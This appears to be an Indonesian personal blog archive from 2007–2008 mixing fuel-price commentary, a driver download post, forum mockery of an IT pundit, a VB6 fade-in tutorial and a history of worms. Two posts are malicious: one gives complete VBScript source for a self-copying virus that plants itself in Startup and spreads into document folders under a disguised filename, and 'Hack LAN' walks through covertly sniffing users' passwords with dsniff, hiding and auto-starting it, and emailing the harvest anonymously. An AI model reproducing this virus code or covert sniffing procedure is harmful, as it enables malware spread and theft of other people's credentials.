Selasa, 21 Agustus 2007

JAKARTA—Presiden Susilo Bambang Yudhoyono menginstruksikan agar ekspor gas ke Jepang dilanjutkan. Beberapa kontrak ekspor gas ke Jepang memang akan mulai habis pada 2010.

http://www.dumaipos.com/index.php?option=com_content&task=view&id=2559&Itemid=4

Energi Indonesia untuk Siapa?

Kompas. Di Tokyo, Presiden Yudhoyono mengumumkan Indonesia tetap akan meneruskan kontrak ekspor gas ke Negeri Sakura.

Kontrak pengiriman gas alam cair ke Jepang yang dimulai sejak 1971 berakhir pada 2010-2011.

Saat yang sama ketika Presiden berada di Jepang, terjadi kelangkaan minyak tanah di Jakarta. Ibu-ibu harus mengantre berjam-jam di pangkalan demi memperoleh jatah 2-3 liter minyak tanah. Produk ini di pasar internasional disebut kerosin, dan kerosin murni dipakai sebagai bahan bakar pesawat jet sehingga harganya sangat mahal. Di Indonesia, kerosin digunakan untuk menyalakan kompor dan dipakai untuk oplosan mesin motor nelayan yang tidak mampu membeli solar.

Setahun terakhir, warga Medan mengalami pemadaman bergilir tiga kali sehari, persis seperti jadwal makan obat, karena krisis pasokan listrik yang sangat parah di Sumatera Utara. Pembangkit Listrik Tenaga Gas dan Uap Sicanang di Belawan yang menjadi pemasok utama listrik di kota itu sudah lama tak mampu beroperasi maksimal karena pasokan gas terus menurun. Dengan kondisi keuangan yang terbatas, PT Perusahaan Listrik Negara (PLN) tidak sanggup membakar bahan bakar minyak lebih banyak untuk menggantikan gas.

Potongan-potongan fakta di atas jika direkatkan menjadi potret kekisruhan kebijakan pemanfaatan energi nasional. Indonesia belum bisa lepas dari kutukan sebagai negeri yang memiliki sumber daya alam melimpah, tetapi gagal memanfaatkan sumber daya itu sebaik-baiknya untuk menyejahterakan masyarakat. Penyebabnya adalah ketidakmampuan pengelolaan energi nasional oleh pemerintah.

Dari segi cadangan energi, Indonesia memiliki batu bara yang bisa diproduksi sebanyak 19,3 miliar ton, cadangan gas 182 triliun kaki kubik, dan cadangan minyak mentah 8 miliar barrel. Dari jumlah itu, jika tidak ada eksplorasi untuk menemukan cadangan baru batu bara hanya cukup untuk 147 tahun, gas bertahan hanya untuk 61 tahun, bahkan minyak bumi hanya mampu bertahan untuk kebutuhan 8 tahun.

Produksi batu bara Indonesia tahun ini 153,7 juta ton dan sekitar 70 persen diekspor. Produksi minyak bumi, termasuk kondensat, tahun ini diproyeksikan kurang dari 1 juta barrel per hari dan sekitar 500.000 barrel diekspor. Produksi gas alam Indonesia tahun 2005 tercatat 8,13 miliar kaki kubik per hari dan sekitar 58,4 persen diekspor dalam bentuk gas alam cair (liquefied natural gas/LNG), elpiji, dan melalui pipa.

http://www.plnjaya.co.id/berita/berita_peristiwa.asp?do=view&id=2909&idm=5&idSM=1

Perbandingan Harga Bensin di Seluruh Dunia

2008-05-16T13:36:00.002+07:00

Berikut adalah daftar harga minyak di seluruh dunia. Di Venezuela harganya hanya Rp 460/liter, di Saudi Arabia Rp 1.104/liter, di Nigeria Rp 920/liter, di Iran Rp 828/liter, di Mesir Rp 2.300/liter, dan di Malaysia Rp 4.876/liter. Rata-rata pendapatan per kapita di negara-negara tersebut lebih tinggi dari kita. Sebagai contoh Malaysia sekitar 4 kali lipat dari negara kita.

Anehnya di negara kita premium yang saat ini harganya Rp 4.500/liter akan dinaikkan hingga Rp 6.000/liter sementara harga Pertamax sekitar Rp 8.700/liter.

Jelas bedanya antara negara yang mementingkan kepentingan rakyat dengan negara Neoliberalis/Pro Spekulan Pasar yang hanya mengikuti harga minyak Internasional.

AS dan Cina adalah importer minyak terbesar dan ketiga di dunia *1. Tapi harga minyak di AS cuma Rp 8.464/liter sementara Cina Rp 5.888/liter.. Padahal penduduk kedua negara lebih besar dari Indonesia (Cina penduduknya 1,3 milyar) .

Indonesia meski premium cuma Rp 4.500 (yang akan dinaikkan jadi Rp 6.000/liter) namun harga Pertamax mencapai Rp 8.700/liter. Lebih tinggi dari harga di AS. Padahal UMR di Indonesia cuma US$ 95/bulan sementara di AS US$ 980/bulan. Jadi Indonesia ini benar-benar mengikuti kemauan spekulan pasar/kaum Neoliberalis.

Dengan memakai patokan harga Internasional US$ 125/barrel maka rakyat AS yang UMRnya US$ 980/bulan masih bisa menabung US$ 955/bulan sementara rakyat Indonesia yang UMRnya hanya US$ 95/bulan harus ngutang sebanyak US$ 30/bulan. Memang rakyat miskin tidak punya mobil mewah, tapi mereka kan tetap harus pakai angkot atau sepeda motor. Dan itu pakai BBM!

Referensi:

1. http://worldnews.about.com/od/oilnaturalgas/tp/oil_imports.htm

http://en.wikipedia.org/wiki/Gasoline_usage_and_pricing

Gasoline usage and pricing

Negara	US$/Ltr	Rp/Ltr	Tanggal	Sumber
Australia	1.37	12,604	4/23/2008	[1]/XE.com
Belgium	2.02	18,584	11/7/2007	[4][5][6]
Brazil	1.56	14,352	4/29/2008	[citation needed]
Canada	1.25	11,500	5/5/2008	GasBuddy/XE.com
China	0.64	5,888	5/5/2007	CNN Money/[2]
Croatia	1.73	15,916	5/5/2007
Cyprus	1.63	14,996	4/22/2008	for Unleaded 95[[3]
Denmark	2.15	19,780	4/21/2008
Egypt	0.25	2,300	7/25/2007	[8]
Finland	2.1	19,320	1/5/2008	[9]
Germany	2.28	20,976	4/20/2008	[10]
Greece	1.3	11,960	3/13/2006
Hong Kong	1.997	18,372	4/12/2008	Shell Hong Kong/[4]
Iceland	2.13	19,596	3/31/2008	Esso/[5]
India	1.22	11,224	10/3/2006
Iran	0.09	828	5/5/2007	CNN Money/[6]
Israel	1.91	17,572	5/1/2008	Israel Min. of National Infrastr.
Italy	1.93	17,756	11/8/2007
Japan	1.01	9,292	9/29/2006	CNN Money/[8]
Kuwait	0.21	1,932	4/3/2006	CNN Money/[9]
Malaysia	0.53	4,876	2/3/2006	Google exchange calculator
Mexico	0.62	5,704	5/5/2007	Banco de Información Económica
Netherlands	2.36	21,712	4/28/2008	Shell
New Zealand	1.44	13,248	4/20/2008	Pricewatch/fx.com on 2006-09-29
Nigeria	0.1	920	3/3/2005	CNN Money/[13]
Norwegia	2.52	23,184	4/14/2008	Shell/[14]
Pakistan	1.06	9,752	5/4/2008	PSO/[15]
Philippines	0.94	8,648	9/17/2007	Shell Philippines/[16]
Romania	1.67	15,364	4/15/2008
Russia	1	9,200	5/7/2008	[11]
Saudi Arabia	0.12	1,104	5/16/2007
Sierra Leone	4.87	44,804	5/1/2008	[18]
Singapore	1.37	12,604	1/2/2008	PetrolWatch/XE.com
Switzerland	1.65	15,180	12/19/2007
Sweden	1.96	18,032	1/3/2008	JET/
Thailand	0.69	6,348	1/13/2007	Nation Multimedia/[19]
Turkey	2.68	24,656	4/22/2008	NTV/[20]
Turkmenistan	0.08	736	11/25/2006	Turkmenistan.ru/[21]
UAE	0.45	4,140	5/4/2008
Ukraine	1.17	10,764	4/18/2008
United Kingdom	2.16	19,872	4/20/2008	petrolprices.com/XE.com
United States	0.92	8,464	4/19/2008	[12]
Venezuela	0.05	460	1/12/2008

Driver Toshiba Satellite A135 - Win XP

2008-05-15T08:35:00.000+07:00

Driver Laptop Toshiba Satellite A135 for Win*** XP

Akhirnya telah sekian lama aku mencari-cari driver chipset ini...ehm ketemu juga...:D sueneng tenan rek..hehehe. Waktu itu aku dah hampir frustasi n' menyerah, karena dukungan temen2 di forum dan juga temen2 sekelas yang rela pinjamin aku komputer untuk cari-cari driver ini (Makasih ya prend, berkat laptop KAU sekarang LT aku juga dah bisa pake XP ..:D kluar fulus lagi neh..).

Sedikit dipersingkat saja..
Untuk donlot Install file Exe silahkan donlot disini
Berikut Spesifikasi dati Laptop Toshiba Satellite A135
ATI 200M/Southbridge drivers ( Sound) - Disini
Video Graphic Adapter ATI Radeon Express 200M - Disini
Realtek audio drivers - Disini
Hotkey utility - Dsini
Realtek LAN - Disini
Atheros wireless LAN - Disini

Untuk langsung driver yang mungkin anda mungkin akan mengistall driver tesebut melalui Device Manager >> Update Driver..
silahkan donlot - Disini

Semoga sampai disini saya a.k.a co_goblok ini dapet membantu kawan - kawan yang mungkin membutuhkan link diatas..

salam echoers..
L.F.A.Y

Kenapa tentang pakar IT kita neh...??

2008-04-03T16:56:00.000+07:00

Lihat saja ulah sang pakar IT kita...

http://www.geocities.com/ratc_noid/ICC-CENTER.gif
http://www.geocities.com/ratc_noid/indonesiaweb.gif
http://www.geocities.com/ratc_noid/karyasuccse.gif
http://www.geocities.com/ratc_noid/nurcholis.gif

Aku sedikit gk enak hati apa yang dibilang pakar IT kita ini..
Ya tambah lagi dengan yang satu ini...

diambil dari diskusi forum..hehehe

unsuprise wrote:
Liat aja kata kata nya hehhehe

Ya biarkan saja lah dia seperti itu menjadi pakar dan menyobongkan dirinya toh yang dia tudah itu salah ahaha moga - moga tidak ada lagi orang orang sperti dia hanya mengumbar omongann

@me: yap betul banget! semua tuh hanya omong kodong eh, kosong! :)

luffy wrote:
lagi pngen di kenal dunia,dan terimalah dengan tersenym klo gsk gitu paling mau ngajarin anaknya,.. just opinion

@me:ya biarkan saja bro...anak kecilkan memang begitu..pengenya dikenal! caper! biar disebut hebat! padahal gak hebat2 amat! :P

black_alpha wrote:
gak pa"lah...
dia cman manas"sin doank...

cman bisa kayak gitu apa bangganya??

JARI TENGAH BUAT PAKAR KITA!!!!

udahlah spam aja emailnya!!!!!
hehehe...

@me: jempol juga ya! tapi jempol kebalik..kakakhahakhakh.. kagak ada yang bisa dibangga2in dari pakar kita ini! bisa cuma omong yang ga jelas..mau menang sendiri..

unsuprise wrote:
Ya setelah di lihat juga itu sangat mirip, jangan 2 itu website dia yang bikin dia yang ngacurin wahahahah bisa aja tuh die xixix

Kalau di suruh web lain mungkin hanya Begong gtu paling wahahah ya harap maklum ;;hehehe

Jadi yang CUPU siapa ya Hacker atau Pakar seperti dia????

Jawab dalam hati saja nanti di tuntut loh hehehe

@me: nah ini lagi... bisa saja dia memang mengelola web ini atau minta adminnya paswd..eeeee. masuk trus ditambahin dech sedikit tulisan biar dilihat kaya deface beneran... hahahahaha :-)

adityahadi wrote:
duh bete banget dah klo liat orang kayak gn...

Katanya pemerhati IT, tapi koq malah musuhan ama kita2
yg nyata2 sama2 mempunyai niat yg baik di dunia IT

huhu....bukannya klo begini citra jelek hacker bakal balik lagi??

kayak lagunya gigi y?? hehe PANAZ, PANAZ, PANAZ, PANAZ PADA DIRI...

@me: bakal panas juga kalau dia lihat tulisan ne..hehehe...ya mudah2han dia ngelihat ya...amin!

konohablueflash wrote:
dia lagi kurang kerjaan kali...

dirumah lagi ga dijatah sama bininya..

makanya utk ngelampiasin stresnya dia ngedeface dh..

padahal smbil ngedeface..

tngnnya dia lagi 'handjob' tuh...

@me:
kalau yang ini tambah setuju...

NB:
Apakah anda tidak belajar bisnis dan manajemen???
anda terlalu ambisius! sombong! dan tidak mau mengelah serta keras kepala!
seharusnya anda (PAK roy suryo) memberikan citra yang baik untuk kepribadian seorang hacker... Bahwa hacker tidak selau merusak seperti yang om, pak atau apalah ( RS ) lakukan seperti diatas.. Melaporkan berbagai kesalahan yang mungkin hacker bisa temukan!

eh, RS udah tau definisi Hacker dan Cracker belum ya? jangan2 udah banyak omong eeeee..ga tau maksudnya...kekekek

VBS Virus bagian 1

2008-03-22T13:27:00.000+07:00

Akhirnya sampe juga post yang satu ini..:D..
kesibukan akhir2 ini yang membuat saya kehabisan waktu untuk membuat post selanjutnya..(maklum pengacara [pengangguran banyak acara..hheheheh :)] yang sok sibuk..:P)..OK tanpa basa basi lagi kita mulai tutorial yang pertama..

TULISAN INI HANYA UNTUK PENDIDIKAN BELAKA YANG MANA TIDAK ADA UNSUR2 YANG KEJAHATAN YANG PENULIS MAKSUDKAN. UNTUK SELANJUTNYA TESERAH ANDA YANG MENENTUKAN..INGAT! KEBIJAKSANAAN ANDALAH CERMIN DARI KESEHATAN JIWA DAN PIKIRAN ANDA..:D

algoritma:
./ Memeriksa eksistensi dirinya pada starup
jika hasil null maka
copikan diri pada startup

./ Memeriksa setiap folder pada my documents eksistensi diri
copikan diri kesetiap folder my documents hingga subfolder terakhir

./ Proses berakhir

dalam algo diatas adalah jalan mudah bagi kita untuk menuliskan urutan2 yang akan kita gunakan acuan nantinya..bisa anda tulis di notepad.

Buka notepad lagi..kemudian ketikkan code berikut:
kalau anda males..(biasa saya juga sering males :P) tinggal copy paste bereskan..??

'====ketik dari REM disini====

Rem === Clara.A / VBS ===
Rem Ini adalah program virus vbs bagian pertama
Rem Dan Hanya untuk tujuan pendidikan bahwa membuat virus itu tdk se-sulit yg dbygkan
Rem Kebijaksanaan anda yang menentukan nasib dari virus ini
Rem =====================

'//* Berikut adalah tugas untuk mengkopikan ke spesial folder startup *//
'//* Berfungsi virus dpt berjalan pd saat windows booting *//

'//* Jika error lanjutkan perintah selanjutnya *//
On error resume next

'//* Deklarasi fungsi object *//
Dim FSO, Induk, WSH, Sasaran, cPath

'//* setting setiap deklarasi object *//
Set FSO = CreateObject("Scripting.FileSystemObject")
set Induk = FSO.GetFile(Wscript.ScriptFullName)
Set WSH = CreateObject("Wscript.Shell")

'//* Mendapatkan folder startup *//
Launch = WSH.SpecialFolders("Startup")

'//* Copy induk dengan nama boot.vbs *//
Induk.Copy (Launch & "\boot.vbs")

'//* Copy Induk di folder my document *//
Launch = WSH.SpecialFolders("MyDocuments")

'//* Infeksi folder my document *//
InfeksiFolder Launch

'//* Membuat Sub untuk menginfeksi Folder my document *//
Sub InfeksiFolder(cPath)
on error resume next

For Each Sasaran in FSO.GetFolder(cPath).SubFolders
Induk.Copy(Sasaran & "\Surat Cinta buat Clara.txt.vbs")
WSH.Run(Sasaran & "\Surat Cinta buat.txt.vbs")

Next

End Sub

'=======berakhir disini=======

code diatas memang sangat sedikit, tetapi proses yang lumayan panjang bro..:P.. Memang saat ini sudah banyak antivirus yang sudah mengenali virus vbs dan code ini pun tak luput dari tiupan antivius..artinya dah kedetect ya?..:P..dari code diatas, nanti akan kita buat acuan untuk code2 selanjutnya..dan akan merajuk ke pemrograman visual(Visual Basic)

boleh anda memperbarui code diatas sebatas UNTUK BELAJAR! bukan untuk merusak komputer orang lain..dengan menambahkan sedikit baris code akan tercipta virus yang semakin dahsyat..bagaimana?? Itu tugas anda selanjutnya..

disini kita sama2 belajar, jadi gak mungkinlah penulis sendiri ga ada salah, sok tau atau sok keminter(bahasa jawa) itu wajar saja..jadi anda sang pembaca yang akan meluruskan penulis..OK?

salam dari saya.. Mohon maaf jika salah..

nb:kirimkan kritik, saran, cacian, makian terdahsyat anda...:D

Hack LAN

2008-03-11T08:45:00.000+07:00

Komunikasi ethernet pada dasarnya adalah komunikasi tipe "siaran" (broadcast). Paket-paket ethernet dari mesin yang satu sebetulnya dilihat oleh setiap komputer yang tergabung dalam suatu jaringan lokal. Paket-paket ini dibuang jika alamat MAC-nya tidak cocok dengan alamat node tujuan.
Nah, dengan menggunakan software-software 'network sniffer', paket-paket ethernet (beserta isinya) yang melewati kartu ethernet tertentu tidak dibuang begitu saja, melainkan dianalisa. Banyak kegunaan sniffing, tapi di artikel ini penulis hanya membahas sniffing password dengan menggunakan program paten karangan Dug Song (www.monkey.org/~dugsong) dsniff.

dsniff aslinya
adalah software Unix, dan teman-teman yang punya Linux/BSD bisa langsung ngedownload dan compile dsniff dari http://www.monkey.org/~dugsong/dsniff). Artikel ini membahas penggunaan di
jaringan lokal berbasis Windows, sebab artikel ini ditujukan untuk pemula, dan mereka-mereka yang pingin memanen password tapi nggak punya akses ke Unix. Program dsniff ini punya spesialisasi menggarap password dari berbagai protokol, dan memformat hasil panenan dalam bentuk yang mudah dibaca.
Protokol yang bisa ditangani oleh dsniff antara lain adalah FTP, Telnet, HTTP, POP, NNTP, IMAP, SNMP, LDAP, Rlogin, NFS, SOCKS, X11, IRC, AIM, CVS, ICQ, Napster, Citrix ICA, Symantec pcAnywhere NAI Sniffer, Microsoft SMB, dan Oracle SQL*Net auth info.

Penggunaan dsniff tidak begitu jauh berbeda antara versi Win32 dengan versi Unix-nya. Kelebihan yang bias dinikmati pengguna Unix saat ini adalah adanya dua program tambahan di dsniff yang membuat dsniff versi Unix lebih perkasa, mampu memanen password dari jaringan berbasis "ethernet switch" atau "active hub", jadi tidak terbatas ke jaringan "hub" saja.

Bahan-bahan/Persyaratan:
--------------------------------
LAN lokal untuk target, yang terhubung dengan menggunakan "ethernet hub" (bukan switch)
- mesin Windows 95, 98 atau ME (untuk 2000 dan XP, kamu mesti punya hak administrator di mesin yg akan digunakan untuk memanen) yang terhubung ke LAN target
- WinPCap library, download dari http://netgroup-serv.polito.it/winpcap/install/bin/WinPcap.exe
- dsniff port to Win32, download dari http://www.datanerds.net/~mike/binaries/dsniff-1.8-win32-static.tgz
(gunakan WinZip untuk nge-extract file-file .exe-nya)

Langkah2nya :
------------------

- Install WinPcap library. Doubleclick winpcap.exe dan ikuti petunjuk di layar (tinggal pencet "Next","Next","Finish")
- Extract file dsniff...tgz nya ke suatu directory (sebaiknya di bawah
C:\Windows atau tempat lain yang nggak terlalu mencurigakan - untuk artikel ini, anggap saja disimpan di C:\WINDOWS\DS)
- Mulai memanen password. Dari start menu, klik "Run", ketik "command". Pindah ke direktori tempat disimpannya dsniff ("cd \windows\ds"). dari prompt C:> tinggal ketik "dsniff".
- silakan menonton password-password milik pengguna ditampilkan di layar

Catatan:
----------
Ada kemungkinan anda harus menspesifikasikan kartu ethernet mana yang ingin disadap. Untuk melihat daftar-daftar interface yang tersedia, ketik "dsniff -D" dari prompt DOS. Anda akan melihat daftar interface yang tersedia. Jika secara default dsniff mencoba menyadap interface yang salah, gunakan "dsniff -i [ketik nama interface disini]".

Pengembangan lebih lanjut
---------------------------------

Untuk menyimpan daftar password yang terpanen ke sebuah file, tambahkan perintah "-w [namafile]" ke program dsniff. Contoh: "c:\WINDOWS\DS>dsniff -i ELNK3 -w password.db"

untuk membaca file yg dibuat dsniff, berikan perintah "-r [namafile]"
contoh: "C:\WINDOWS\DS>dsniff -r password.db"

secara opsional, jika anda ingin file hasil panen ini disimpan dalam bentuk file ASCII:
"C:\WINDOWS\DS>dsniff -r password.db > panen.txt",

panen.txt siap disajikan.

Yang lebih asyik lagi, bisa kita konfigurasikan agar usaha panen kita tetap berjalan walaupun komputer tersebut di-reboot.Caranya gampang. Mula-mula download dulu program "start minimized" (sm.exe) dari http://www.ethernal.org/List-Archives/curves-kiddies-0010/msg00029.html. Simpan program ini di
C:\WINDOWS. Kemudian kita bikin batch file yang bisa dijalankan dari command prompt. Gunakan Notepad atau "edit" untuk membuat file ini, dan sebagai isi:
@echo off
sm /hidden c:\windows\ds\dsniff.exe -w > password.db

(tambahkan perintah opsional seperti "-i ELNK3" jika perlu)

Nah, simpan file ini (sebagai "ds.bat", misalnya), dan pindahkan file ini ke folder "Startup" lewat Start menu supaya tiap kali komputer di-restart, program dsniff kita dijalankan juga, siap untuk memanen. Program "sm" diatas berfungsi menjalankan program secara tersembunyi supaya tidak mencurigakan.
Tentu saja, biar lebih nggak mencurigakan lagi, rubah nama dsniff.exe ke nama lain, dan jangan lupa ngeganti perintah "dsniff" dengan nama yang baru di semua command dan batch file.
Sekarang anda bisa tinggalkan komputer tersebut, dan dikemudian waktu kembali lagi untuk memeriksa sejauh mana hasil sadapan anda bekerja (dengan perintah "dsniff -r password.db > panen.txt" lalu "notepad panen.txt").

Membuat sadapan lebih portabel
-----------------------------
Untuk membuat disket dsniff, file-file yang anda perlukan adalah: dsniff.exe
wpcap.dll (cari di C:\WINDOWS\SYSTEM atau C:\WINDOWS\SYSTEM32 untuk Win2K/XP) wpcap.vxd packet.dll

simpan file-file ini ke disket (ASmile, dan tinggal dibawa disketnya ke LAN target. Penjalanan perintah masih tetap sama seperti diatas, kecuali lokasi prompt nya bukan di :\WINDOWS\DS>, melainkan di A:\>.
Jika anda butuh tantangan tambahan, gunakan perintah "at" dan program pengirim email blat.exe" untuk mengirimkan hasil panenan ke alamat e-mail anonimus anda setiap jam atau bahkan setiap 5 menit. Jangan lupa bagi-bagi hasil Smile.

Tambahan-tambahan
--------------------------
Port dsniff-win32 juga mengandung beberapa utility ekstra, seperti mailsnarf (untuk membaca lalu lintas e-mail di jaringan lokal), urlsnarf (untuk membaca alamat-alamat website yang dikunjungi pengguna LAN sekitar anda), dan webspy (untuk menguntit jejak surfing mesin tertentu).

Silahkan anda coba main-main dengan utiliti-utiliti ini, penulis yakin akan ada gunanya. Harap diingat bahwa teknik diatas hanya mempan untuk LAN yang terhubung melalui "ethernet hub". Jika kebetulan LAN anda menggunakan "ethernet switch", bukan berarti nggak ada harapan. Pengguna versi
Unix-nya dsniff bisa cengar-cengir, sebab paket dsniff versi Unix mengandung dua program tambahan: arpspoof (untuk 'menipu' mesin-mesin lain agar mengirimkan paket ke mesin anda) dan macof (untuk membanjiri "switch" lokal dengan alamat-alamat MAC acak, biasanya berakibat "ethernet switch"
yang ditargetkan menjadi bingung dan mengubah mode menjadi default, bertingkah laku seperti "ethernet hub").

Deteksi, Pencegahan, dan Penanggulangan
--------------------------------------------------
Sebagai admin, anda bisa mendeteksi kartu-kartu ethernet di LAN anda yang menjalankan dsniff (dan progarm-program sejenis dsniff) karena secara prinsip, untuk meng-capture paket-paket, interface ybs harus berada dalam mode "promiscous". Jadwalkan program-program ini untuk berjalan setiap 5 menit, dan konfigurasikan agar komputer pendeteksi mengemail anda jika ada aktifitas-aktifitas mencurigakan.
Utiliti yang bisa anda gunakan termasuk "promisc", "CPM", "ifstatus", atau yang lebih yahud lagi, utilitas buatan grup hacking Portugal The Apostols yang bernama "NePED" (http://metalab.unc.edu/pub/Linux/distributions/trinux/src/neped.c). Untuk platform Windows, tersedia produk-produk komersil seperti LANGuard/LANSniffer atau AntiSniff dari L0pht Heavy Industry (http://www.l0pht.com/antisniff). Diantara produk-produk diatas, sebagian besar hanyalah bisa mendeteksi adanya sniffer jika dijalankan di mesin lokal. Untuk mendeteksi network secara remote, gunakan NePED atau AntiSniff.

Jika anda punya budget, beli switch ethernet yang nggak nge-default ke "hub mode" kalau di-flood alamat-alamat MAC palsu. Kalau anda nggak ngerti, harap ngambil kursus "Pengenalan TCP/IP" atau berhenti jadi admin. Juga harap ingat bahwa banyak perusahaan-perusahaan yang mengklaim menjual hub yang tak bisa disadap, tapi ternyata hanya menjual hub tipe "active huub" yang biasanya tidak bisa menghandel traffic Fast Ethernet (100 Mbps).

Cara paling handal untuk mencegah bocornya informasi sensitif lewat network adalah dengan menggunakan enkripsi. Pakailah SSH, SCP (pengganti FTP) atau SFTP, TLS (untuk memeriksa e-mail), SSL dan HTTPS (untuk transaksi web), tunelling, dll. Usahakan agar jangan sampai ada program yang mengirimkan password tanpa enkripsi melalui jaringan yang anda kelola. Juga selalu periksa keadaan hard disk anda.
Seringkali sniffer-sniffer meninggalkan jejak berupa file hasil panenan yang berukuran besar (apalagi jika LANnya sibuk).

Cara lain mengamankan network anda adalah dengan memindahkan topologi jaringan anda ke sistem token ring, _dan_ menggunakan kartu-kartu ethernet Token-Ring buatan IBM (iklan sabun colexz). Tapi tentunya metode ini tidaklah praktis bagi anda yang ingin tetap menggunakan topologi star atau hybrid.

Teknik AlphaBlend Visual Basic 6.0

2008-03-04T09:35:00.000+07:00

Teknik AlphaBlend merupakan sebuah animasi ketika proses atau aplikasi mulai load atau berjalan. Dengan berupa muncul sedikit demi sedikit ataupun menghilang sedikit demi sedikit. Teknik ini dapat memperindah program yang anda buat!

Anda boleh memodifikasi sedemikian hingga..terserah anda dan kreatifitas anda

Okey sekarang kita mulai

Project yang dibutuhkan
a/. 1 Form dengan Properties Form Visible = False
b/. 2 Timer dengan Properties Intervalnya masing-masing = 100 and Enabled = False


//* Code Start *//

Option Explicit

Const LWA_BOTH = 3
Const LWA_ALPHA = 2
Const LWA_COLORKEY = 1
Const GWL_EXSTYLE = -20
Const WS_EX_LAYERED = &H80000

Private Declare Function GetWindowLong Lib "user32" Alias "GetWindowLongA" (ByVal hWnd As Long, ByVal nIndex As Long) As Long

Private Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" (ByVal hWnd As Long, ByVal nIndex As Long,ByVal dwNewLong As Long) As Long

Private Declare Function SetLayeredWindowAttributes Lib "user32" (ByVal hWnd As Long, ByVal color As Long, ByVal x As Byte, ByVal alpha As Long) As Boolean

Dim TransparanDonk As Integer

Sub Transparan(hWndBro As Long, TransBro As Integer)
On Error Resume Next

Dim OKBro As Long
OKBro = GetWindowLong(hWndBro, GWL_EXSTYLE)

SetWindowLong hWndBro, GWL_EXSTYLE, OKBro Or WS_EX_LAYERED
SetLayeredWindowAttributes hWndBro, RGB(255, 255, 0), TransBro, LWA_ALPHA
Exit Sub

End Sub

Private Sub Form_Load()
Timer1.Enabled = True
End Sub

Private Sub Form_Unload(Cancel As Integer)
Cancel = 1
Timer1.Enabled = False
Timer2.Enabled = True
End Sub

Private Sub Timer1_Timer()
On Error Resume Next
TransparanDonk = TransparanDonk + 5
If TransparanDonk > 255 Then TransparanDonk = 255: Timer1.Enabled = False
Transparan Me.hWnd, TransparanDonk
Me.Show
End Sub

Private Sub Timer2_Timer()
On Error Resume Next
TransparanDonk = TransparanDonk - 5
If TransparanDonk < 0 Then TransparanDonk = 0: Timer2.Enabled = False: End  Transparan Me.hWnd, TransparanDonk
End Sub 

//* End Of File *// 


NB: Jangan lupa kasih Komentar ya..saran, kritik

How to create VIRUS Computer ?

2008-02-20T11:53:00.001+07:00

Mungkin karena kesibukan penulis yang super(wouih...sibuk ngapa neh?), jadinya belum sempat untuk membuat virus(ecek-ecek) untuk posting kali ini. Berikut ini adalah contoh virus (code) Visual Basic Script / VBS dari sekian banyak virus(code) yang beredar di web Indonesia. Semoga dengan adanya Open Source ini, rekan2 sekalian mampu untuk membuat yang lebih tangguh(maksudnya berguna donk..!!:)))dari yang ada dipasaran saat ini. Terima kasih buat yang buat Code ini, semoga kelak bisa menjadi orang yang berguna bagi bangsa dan negara Kita (penulis maksudnya..!:P)

artikel aseli DISINI

Lain waktu penulis akan membuka code yang mungkin sangat sederhana dan simple untuk belajar memahami virus, pembuatan (pengkodean virus), serta removal dari virus yang kita buat nanti.

All about of virus, worm, and trojan

2008-02-20T10:12:00.000+07:00

Gagasan worm dan virus berawal pada tahun 1949, saat seorang founder Electronic Discrete Variable Automatic Computer (EDVAC), John Von Newman, memaparkan dalam sebuah papernya yang berjudul "Theory and Organization of Complicated Automata", dibahas suatu kemungkinan bahwa suatu program dapat melakukan penyebaran dengan sendirinya. Kemudian pada tahun 1960-an, para peneliti AT&T Bell Laboratory membuat semacam permainan dengan menciptakan suatu program yang dapat memusnahkan program ciptaan lawan, dan mampu bertahan terhadap serangan program lawan lainnya. Pada akhirnya si-pemenang adalah pemilik program yang tersisa paling banyak. Para peneliti sadar akan bahaya program tersebut, maka setiap selesai permainan program tersebut selalu dimusnahkan. Cikal bakal program worm pertama kali dibuat oleh Bob Thomas pada tahun 1971. Program ini merupakan solusi dari kebutuhan system kendali lalu lintas udara. Program ini akan membantu mengingatkan operator apabila pengendalian suatu pesawat udara berpindah dari satu komputer ke komputer lainnya. Sesungguhnya program yang disebut "creeper" ini hanya berpindah dari layar ke layar pada jaringan, dengan menampilkan pesan "I’m creeper! Catch me if you can!". Tetapi program creeper tidak mereproduksi dirinya sendiri, hingga beberapa programmer lain

mencoba membuat program serupa, tetapi gagasan tersebut berangsur- angsur hilang dalam beberapa bulan kemudian. Istilah "virus" mungkin sudah tidak asing terdengar, dapat dikatakan hampir setiap orang yang mengenal komputer juga mengenal istilah ini, sementara istilah "worm" tidak begitu dikenal, padahal istilah ini diciptakan oleh John Shoch dan Jon Hupp di Xerox PARC (Palo Alto Research Centre) pada tahun 1979 sebelum istilah virus computer dipublikasikan. Istilah worm ini ternyata diilhami oleh suatu program "tapeworm" (cacing pita) dalam sebuah novel fiksi ilmiah karangan John Brunner yang berjudul "The Shockwave Rider", yang mengisahkan suatu pemerintahan totaliter yang mengendalikan warga negaranya melalui suatu jaringan komputer. Untuk memerangi hal itu akhirnya seorang pahlawan dalam novel tersebut kemudian memenuhi jaringan dengan suatu program yang disebut "tapeworm" sehingga memaksa mematikan jaringan computer yang secara otomatis juga menghilangkan kendali pemerintah terhadap warga negaranya. Kemudian diawal tahun 1980 John Shoch dan Jon Hupp mengadakan sebuah penelitian dengan mengembangkan lima buah program worm, masing-masing worm dibuat dengan tujuan tertentu yang membantu jaringan disekitarnya. Beberapa worm terlihat sederhana, seperti worm "town crier" yang bertugas memasuki jaringan hanya untuk menampilkan pengumuman. Worm lainnya terlihat lebih kompleks dan pintar, seperti worm "vampire". Worm ini tidak akan melakukan kegiatan pada siang harinya, tetapi saat malam hari worm akan melakukan suatu kegiatan tertentu yang telah terprogram sebelumnya, ini berguna untuk memanfaatkan computer yang tidak bekerja pada malam hari dengan memberikan tugas yang kompleks dan memerlukan daya proses yang lebih. Saat fajar, worm akan menghentikan pekerjaannya dengan terlebih dahulu menyimpan seluruh pekerjaan yang dilakukannya malam itu dan menunggu sore berikutnya. Walau bagaimanapun, walaupun program ini berguna tapi disadari bahwa program ini juga akan sangat berbahaya apabila salah digunakan. Hal ini terbukti saat sebuah worm mengalami malfungsi pada suatu malam dan keesokan harinya para pekerja menemukan seluruh komputer yang ada pada jaringan tersebut mengalami crash (suatu kerusakan dimana system output dan input tidak berfungsi). Lebih dari itu saat komputer dihidupkan kembali, worm malfungsi tersebut kembali membuat komputer crash. Pada akhirnya dibuat semacam vaksin untuk mencegah worm tersebut, dan mulai saat itu penelitian terhadap worm tersebut ditutup untuk umum.

